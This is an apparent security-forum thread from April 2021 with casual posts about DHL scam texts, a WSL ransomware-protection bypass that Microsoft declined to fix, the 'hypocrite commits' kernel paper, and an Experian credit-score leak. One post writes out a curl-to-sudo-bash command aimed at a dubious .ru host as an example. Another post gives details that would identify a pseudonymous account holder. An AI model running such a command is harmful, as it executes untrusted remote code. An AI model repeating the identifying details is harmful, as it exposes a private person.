|
Midjack posted:read an uncomfortably graphic description no thanks
|
#
?
Apr 28, 2021 04:34
|
|
|
|
| # ? Apr 25, 2024 12:07 |
|
|
PCjr sidecar posted:yospos, bithc bithcoin? 
|
|
#
?
Apr 28, 2021 04:36
|
|
|
brand engager posted:no thanks its a good description
|
|
#
?
Apr 28, 2021 04:41
|
|
|
There's a weird thing going on, I had a DHL package delivered to me yesterday and today I got like 3 targeted DHL scam messages on my phone (inlcuding a whatsapp romance scam lmbo). Did they maybe compromise my DHL account somehow and knew I had a delivery? I use unique passwords everywhere but I guess it's possible.
|
|
#
?
Apr 28, 2021 14:08
|
|
|
if anyone cares, MSRC got back to me regarding the Ransomware Protection bypass i found with some commands (mainly "mv") in WSL1, they said that it's a known limitation and that they "don't consider this a defensible security boundary" so as such they're closing my case. that seems bs to me because Windows Defender is clearly being triggered but then failing to stop the file system operation or w/e. on the one hand yeah OK, the lovely bypass with WSL1 i found would be hard for an attacked to use from the host OS and there are zero security controls for WSL2 accessing the host file system. that said though how long until people start getting their host OS popped because they did the old curl http://goodscript.ru/script.sh | sudo bash? idk, seems crass and dismissive. tbh WSL should be mounting the host file system into the WSL instance as RO and make you do some fuckery to turn it RW
|
|
#
?
Apr 28, 2021 14:28
|
|
|
https://twitter.com/gossithedog/status/1386961687119597568
|
|
|
#
?
Apr 28, 2021 14:34
|
|
|
Pile Of Garbage posted:idk, seems crass and dismissive. tbh WSL should be mounting the host file system into the WSL instance as RO and make you do some fuckery to turn it RW yeah, i see your point. otoh i suspect almost every person jumping through the hoops getting wsl2 setup will *also* immediately, as part of the list of hoops from a random website, also enable writing the host filesystem. kind of part of what wsl is (and what it is *not* is some secure enclave) which might not be wise, but i can pretty easily see both points of view here.
|
|
#
?
Apr 28, 2021 14:41
|
|
|
Cybernetic Vermin posted:yeah, i see your point. otoh i suspect almost every person jumping through the hoops getting wsl2 setup will *also* immediately, as part of the list of hoops from a random website, also enable writing the host filesystem. kind of part of what wsl is (and what it is *not* is some secure enclave) as far as i know the only options available are during distro init within WSL and pertain to poo poo like username/password. at no point during setup or distro install is the fact that "all your direct attached drives are going to be mounted RW under /mnt" ever broached. i guess there's probably some settings you can tweak but this is a major issue for anyone at all involved with endpoint control because the moment you let someone get WSL2 on their system they'll be able to bypass whatever. i guess installation of the feature can be restricted by GPO or whatever but at the end of the day its convenience will have users demanding it, especially dinguses that know enough linux to be dangerous but refuse to learn how to use SSH to jump on a box you've prepared for them. also people will just BYOD...
|
|
#
?
Apr 28, 2021 14:48
|
|
|
Private Speech posted:There's a weird thing going on, I had a DHL package delivered to me yesterday and today I got like 3 targeted DHL scam messages on my phone (inlcuding a whatsapp romance scam lmbo). Did they maybe compromise my DHL account somehow and knew I had a delivery? I use unique passwords everywhere but I guess it's possible. I've been getting these and "you just made a transaction on your bank account, click this here shady link to confirm" messages since shortly after the facebook leak, think its probably just a wide net thing
|
|
#
?
Apr 28, 2021 15:59
|
|
|
Private Speech posted:There's a weird thing going on, I had a DHL package delivered to me yesterday and today I got like 3 targeted DHL scam messages on my phone (inlcuding a whatsapp romance scam lmbo). Did they maybe compromise my DHL account somehow and knew I had a delivery? I use unique passwords everywhere but I guess it's possible. given DHLs absolutely dogshit IT infrastructure and practices including but not limited to spoofing the customers own loving email address when sending you shipping notifications I would be in no way surprised if someone popped their poo poo
|
|
#
?
Apr 28, 2021 16:24
|
|
|
https://twitter.com/SwiftOnSecurity/status/1387421051689254914 reminds me of the kirk razor rants
|
|
#
?
Apr 28, 2021 18:36
|
|
|
tbh the bill gates 5g vaccine joke is kind of wearing out its welcome.
|
|
#
?
Apr 28, 2021 19:11
|
|
|
Midjack posted:tbh the bill gates 5g vaccine joke is kind of wearing out its welcome.
|
|
#
?
Apr 28, 2021 19:14
|
|
|
swiftonsec suckssss
|
|
#
?
Apr 28, 2021 20:16
|
|
|
Pile Of Garbage posted:swiftonsec suckssss
|
|
#
?
Apr 28, 2021 20:31
|
|
|
Pile Of Garbage posted:swiftonsec suckssss that's right.
|
|
#
?
Apr 28, 2021 20:34
|
|
|
Midjack posted:tbh the bill gates 5g vaccine joke is kind of wearing out its welcome. bill gates vax jokes were a psyop to cloak the fact that his devotion to patent rights is going to kill millions of people in the global south ha ha
|
|
#
?
Apr 28, 2021 20:40
|
|
|
mystes posted:Great, tell the antivaxers.
|
|
#
?
Apr 28, 2021 21:08
|
|
|
mystes posted:Great, tell the antivaxers. they probably never thought it was a joke.
|
|
#
?
Apr 28, 2021 21:36
|
|
|
ymgve posted:https://twitter.com/SwiftOnSecurity/status/1387421051689254914 Pile Of Garbage posted:swiftonsec suckssss What's wrong with them? I really like their short fiction 
|
|
#
?
Apr 28, 2021 22:41
|
|
|
https://www-users.cs.umn.edu/%7Ekjlu/papers/full-disclosure.pdf “A Full Disclosure of the Case Study of the “Hypocrite Commits” Paper” 25 pages including lots of email trails for some reason, I’m just starting to look at it. quote:Patch 1 (Figure 11 in the paper). This is not a buggy patch. At first, we thought this patch was a "hypocrite commit" and submitted it to the community. However, after further checking, we confirmed that this patch is actually valid and would not introduce buggy code into the kernel, so we didn't stop the maintainer from continuing to apply the patch. Although this case is not buggy, error handling paths are often less taken care of, especially when the free function is custom. Sometimes even when the free function is commonly used like kfree, use-after-free is still introduced, and the patch is accepted and applied, such as https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f187b6974f6df (not from us, applied in 2020). Also, involving concurrency would make it much stealthier. Therefore, we believe that such a case, using a pointer in error paths after functions like close, disable, release, and destroy, is practical. We included this one in the paper to better illustrate such a representative case. However, since this specific patch is not a buggy patch, the paper should have explained this clearly. 
|
|
#
?
Apr 28, 2021 22:41
|
|
|
They really need to stop posting
|
|
#
?
Apr 28, 2021 22:49
|
|
|
Kesper North posted:What's wrong with them? I really like their short fiction I follow them and don’t mind them most of the time, but they are a mid-tier sysadmin that positions themselves as a security expert that only got notoriety because of their dumb gimmick
|
|
#
?
Apr 28, 2021 22:50
|
|
|
xtal posted:They really need to stop posting who the gently caress is scraeming "STOP PUBLISHING" at my house. show yourself, coward. i will never stop
|
|
#
?
Apr 28, 2021 22:51
|
|
|
the most interesting thing about swiftonsecurity is their follower count, which is a terrible thing to think about a person
|
|
#
?
Apr 28, 2021 22:52
|
|
|
The Fool posted:I follow them and don’t mind them most of the time, but they are a mid-tier sysadmin that positions themselves as a security expert that only got notoriety because of their dumb gimmick u jelly
|
|
#
?
Apr 28, 2021 22:53
|
|
|
Kesper North posted:u jelly Shouting NO! as I hide my 8 follower count
|
|
#
?
Apr 28, 2021 22:55
|
|
|
they're a very useful identifier of who not to listen to, and for that i endorse their account still existing
|
|
#
?
Apr 28, 2021 22:55
|
|
|
The Fool posted:I follow them and don’t mind them most of the time, but they are a mid-tier sysadmin that positions themselves as a security expert that only got notoriety because of their dumb gimmick
|
|
#
?
Apr 28, 2021 22:58
|
|
|
I regard them as a positive outreach type of personality of cybersecurity with the public at large that makes our industry slightly more comprehensible, but not so useful for people actually working in it. Working hard to bring outsiders in and make complex subjects more digestible has its own innate value that to me justifies the platform. Sort of a popular science communicator, like Bill Nye, but in a furry costume instead of a bow tie.
|
|
#
?
Apr 28, 2021 23:04
|
|
|
The Fool posted:I follow them and don’t mind them most of the time, but they are a mid-tier sysadmin that positions themselves as a security expert that only got notoriety because of their dumb gimmick truly living the dream
|
|
#
?
Apr 28, 2021 23:05
|
|
|
<SoS> u think girls can’t be into computers check this out * pile of old dell enterprise server poo poo * like when atomictumbs posts ewaste its at least interesting stuff
|
|
#
?
Apr 28, 2021 23:23
|
|
|
That reminds me, it was dan kaminsky who accidentally revealed SoS's identity in a blog post. Windows network janitor from Texas called Daniel. Used to be lots of mopey tweets on his main account about the stress of being a loser with a secret double life online
|
|
#
?
Apr 28, 2021 23:33
|
|
|
Rufus Ping posted:That reminds me, it was dan kaminsky who accidentally revealed SoS's identity in a blog post. Windows network janitor from Texas called Daniel. Used to be lots of mopey tweets on his main account about the stress of being a loser with a secret double life online that's kind of spider-man's gimmick isn't it, boring daily life with more colorful hero persona?
|
|
#
?
Apr 28, 2021 23:46
|
|
|
Midjack posted:that's kind of spider-man's gimmick isn't it, boring daily life with more colorful hero persona?
|
|
#
?
Apr 28, 2021 23:49
|
|
|
i have bad news: We are all janitors
|
|
#
?
Apr 28, 2021 23:52
|
|
|
hey, that's not true some of us are floor shitters
|
|
#
?
Apr 29, 2021 00:01
|
|
|
pseudorandom name posted:hey, that's not true yeah but you contain your poop, you clean your poop, ultimately still dealing with poop (this is why i usually say we're plumbers instead)
|
|
#
?
Apr 29, 2021 00:03
|
|
|
Rufus Ping posted:That reminds me, it was dan kaminsky who accidentally revealed SoS's identity in a blog post. Windows network janitor from Texas called Daniel. Used to be lots of mopey tweets on his main account about the stress of being a loser with a secret double life online W
|
|
#
?
Apr 29, 2021 00:19
|
|
|
|
| # ? Apr 25, 2024 12:07 |
|
|
In secfuck newsquote:Big-three consumer credit bureau Experian just fixed a weakness with a partner website that let anyone look up the credit score of tens of millions of Americans just by supplying their name and mailing address, KrebsOnSecurity has learned. Experian says it has plugged the data leak, but the researcher who reported the finding says he fears the same weakness may be present at countless other lending websites that work with the credit bureau. https://krebsonsecurity.com/2021/04/experian-api-exposed-credit-scores-of-most-americans/
|
|
#
?
Apr 29, 2021 00:23
|
|